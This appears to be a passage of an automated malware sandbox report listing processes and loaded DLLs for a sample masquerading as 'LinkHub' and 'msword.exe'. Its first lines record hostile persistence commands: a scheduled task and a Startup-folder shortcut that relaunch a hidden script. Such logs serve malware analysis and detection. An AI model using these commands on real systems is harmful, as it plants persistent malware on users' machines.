Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url" & echo URL="C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url" & exit
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y"
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: iconcodecservice.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: bcp47langs.dll
